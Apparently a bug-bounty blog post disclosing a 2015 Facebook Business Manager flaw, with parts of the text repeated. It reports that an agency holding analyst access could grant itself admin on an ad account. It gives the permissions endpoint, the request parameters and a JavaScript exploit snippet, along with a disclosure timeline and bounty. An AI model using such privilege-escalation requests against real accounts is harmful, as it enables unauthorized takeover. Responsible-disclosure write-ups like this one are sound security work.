Bypass ad account roles vulnerability 2015
2015
ads
bounty
bug
business
bypass
exploit
facebook
facebook exploit
hack
roles
vulnerability
1 comment
1 comment
I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account
admins in ad account can add any user to their ad account with these 3 type of role :
Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com
in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)
the vulnerability that I found, allow these agencies with normal role(2,3) change their own access to admin!
I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!
request body :
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]
admins in ad account can add any user to their ad account with these 3 type of role :
- admin
- advertiser
- analyst
Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com
in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)
the vulnerability that I found, allow these agencies with normal role(2,3) change their own access to admin!
Scenario :
I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!
Details:
with analyst permission in any ad account send this request :
request url : facebook.com/ads/manage/settings/permissions/?action=add_user
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]
Exploit :
var Xhr;
Xhr = new XMLHttpRequest ();
Xhr.open("POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)
POC :
I removed some section that used userid or email
Timeline:
- Mar 14, 2015 01:27am: Initial report
- Mar 17, 2015 03:35am: Bug acknowledged by security team
- Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
- Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.
great find
ReplyDelete